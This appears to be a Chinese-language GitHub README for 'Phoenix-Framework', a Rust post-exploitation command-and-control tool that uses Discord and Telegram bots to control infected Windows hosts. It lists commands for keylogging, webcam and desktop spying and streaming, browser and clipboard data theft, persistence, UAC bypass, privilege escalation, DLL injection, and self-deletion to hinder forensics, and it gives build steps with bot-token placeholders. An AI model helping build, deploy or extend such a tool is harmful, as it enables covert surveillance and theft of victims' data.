xM0kht4r/Phoenix-Framework

# Phoenix-Framework Phoenix 是一个基于异步的后渗透框架，利用受信任的站点进行 C2 通信。

# ## 支持的平台 Phoenix 目前通过其 Bot API 支持以下平台： - Discord - Telegram - Reddit (即将推出) Phoenix 提供以下基础功能： - 字符串混淆 - 自动下载用户在聊天中上传的附件 - 自毁功能以阻碍取证工作 - 带有窗口标题捕获功能的键盘记录 - 摄像头和桌面截图及实时流媒体传输 - 浏览器数据收集 - ... # ## 命令 ``` Command Description ------- ----------- /hello Check if the bot is acive on the host /help Print help message /persist Maintain access after reboot. (Requires UAC bypass) /sleep Sleep. Usage: /sleep (seconds) /reboot Reboot the host /shutdown Shutdown the host /exit End the session /self_del Self-delete the executable /pwd Print working directory /dir List working directory /cd Change directory. Usage: /cd (path) /search Search for files. Usage: /search (path) (file) /upload Upload files. Usage: /upload (file), /upload *.jpg /uid Get the user id /users List the available users /privs List the privileges /sysinfo Print system informations /location Retrieve geolocation informations /hw List installed hardware /sw list installed software /drv List connected drives /net List network Adapters /pid Show the current process ID /ps List running processes /pkill Kill a process by ID /exec Execute a command /chat Display a custom message /webcam_list List available webcams /webcam_snap Take a webcam snapshot: Usage: /webcam_snap (index) /recaudio Record audio. Usage: /recaudio (seconds) /screenshot Take a screenshot /keylog Start keylogging /keylog_stop Stop keylogging threads /browser_dump Dump browser data /clipboard Dump clipboard data /stream_desktop Live stream the host desktop /stream_webcam Live stream the host webcam /stream_stop Stop live streaming threads *** needs work /get_system Elevate privileges to SYSTEM /bypass_uac Bypass UAC prompts /inject Inject a target process. Usage: /inject (dll_path) ``` # # ## 使用说明 Phoenix 目前正在实现简单的 XOR 混淆，这意味着 token 仍然会被硬编码在二进制文件中。这种混淆只是一项基础防御，旨在防止随意的字符串检查，并不能阻止熟练的逆向工程师。 #### + Ngrok： Ngrok 对于隧道传输实时流媒体流量至关重要，如果没有合适的 ngrok token，Phoenix 将无法流式传输主机的桌面/摄像头画面。 1. 注册 ngrok 账号：https://ngrok.com/ 2. 在 `/src/tunnel.rs` 中，将变量 `token` 替换为您真实的 token： ``` let token = obfuscate!("YOUR_NGROK_TOKEN"); ``` # #### + Telegram： 1. 创建 bot：https://core.telegram.org/bots/tutorial 2. 在 `/src/telegram.rs` 中，将变量 `bot_token` 和 `id` 替换为您真实的 bot token 和聊天 ID： ``` let bot_token = obfuscate!("YOUR_TELEGRAM_TOKEN"); let id: i64 = 123456789; ``` 3. 编译二进制文件： ``` > cargo build --release --bin telegram ``` # #### + Discord： 1. 创建 bot：https://discord.com/developers/applications 2. 在 `/src/discord.rs` 中，将变量 `token` 替换为您真实的 bot token： ``` let token = obfuscate!("YOUR_DISCORD_TOKEN"); ``` 3. 编译二进制文件： ``` > cargo build --release --bin discord ``` ## 概念验证 # # ## 🔌 免责声明 ## 🤝 合作 欢迎贡献和建议！如果您有“合乎道德的”商业咨询或希望合作，请随时通过以下方式联系：M0kht4rHacks@protonmail.com

标签：C2框架, CSV导出, Discord僵尸网络, HTTP工具, IP 地址批量处理, Rust语言, Telegram僵尸网络, UAC绕过, Windows平台, x64架构, 可视化界面, 后渗透框架, 嗅探欺骗, 子域名变形, 字符串混淆, 安全学习资源, 屏幕截图, 屏幕直播, 异步编程, 摄像头监控, 数据窃取, 权限维持, 浏览器数据窃取, 滥用可信站点, 端点可见性, 网络安全, 自毁功能, 远程控制, 键盘记录, 防取证, 隐私保护, 隐蔽通信, 黑产工具